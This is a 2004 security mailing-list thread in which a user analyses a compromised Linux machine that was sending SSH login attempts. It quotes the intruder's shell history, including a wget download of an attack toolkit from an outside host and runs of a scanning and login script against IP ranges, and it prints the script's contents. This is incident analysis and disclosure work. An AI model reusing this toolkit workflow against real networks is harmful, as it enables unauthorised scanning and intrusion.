This all looks very similair to the couple year old ssh1 hack, I recall some of these same files and binaries I think from that old hack, but, this looks like someone took an old hack and tried to rework it as a brute forcer for poorly setup systems.
Thanks, Ron DuFresne On Thu, 29 Jul 2004, Andrei Galca-Vasiliu wrote: > By the way, you have to be root to use "ss": > > [EMAIL PROTECTED]:~/ssh$ ./go.sh 82.77.45 > scanning network 82.77.*.* > usec: 30000, burst packets 50 > using inteface eth0 > ERROR: UID != 0 > > > Intr-un mail de pe data de Thursday 29 July 2004 19:38, Stefan Janecek > povestea: > > Hmmm - I have also been getting those login attemps, but thought them to > > be harmless. Maybe they are not *that* harmless, though... Today I > > managed to get my hands on a machine that was originating such login > > attempts. I must admit I am far from being a linux security expert, but > > this is what I've found out up to now: > > > > Whoever broke into the machine did not take any attempts to cover up his > > tracks - this is what I found in /root/.bash_history: > > > > ------ > > id > > uname -a > > w > > id > > ls > > wgte frauder.us/linux/ssh.tgz > > wget frauder.us/linux/ssh.tgz > > tar xzvf ssh.tgz > > tar xvf ssh.tgz > > ls > > cd ssh > > ls > > ./go.sh 195.178 > > ls > > pico uniq.txt > > vi uniq.txt > > ls > > rm -rf uniq.txt > > ./go.sh 167.205 > > ls > > rm -rf uniq.txt vuln.txt > > ./go.sh 202.148.20 > > ./go.sh 212.92 > > ./go.sh 195.197 > > ./go.sh 147.32 > > ./go.sh 213.168 > > ./go.sh 134.176 > > ./go.sh 195.83 > > ------ > > > > um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two > > binaries: > > > > go.sh: > > ------- > > ./ss 22 -b $1 -i eth0 -s 6 > > cat bios.txt |sort | uniq > uniq.txt > > ./sshf > > ------- > > > > * 'ss' apparently is some sort of portscanner > > * 'sshf' connects to every IP in uniq.txt and tries to log in as user > > 'test' first, then as user 'guest' (according to tcpdump). > > > > This does not seem to be a stupid brute force attack, as there is only > > one login attempt per user. Could it be that the tool tries to exploit > > some vulnerability in the sshd, and just tries to look harmless by using > > 'test' and 'guest' as usernames? > > > > The compromised machine was running an old debian woody installation > > which had not been upgraded for at least one year, the sshd version > > string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10' > > > > As already mentioned, I am far from being an expert, but if I can assist > > in further testing, then let me know. Please CC me, I am not subscribed > > to the list. > > > > cheers, > > Stefan > > > > > > > > > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.netsys.com/full-disclosure-charter.html > > -- > *:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-. > > Andrei Galca-Vasiliu > Folio Q Advertising > www.fq.ro > > > Security is an illusion... > > *:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
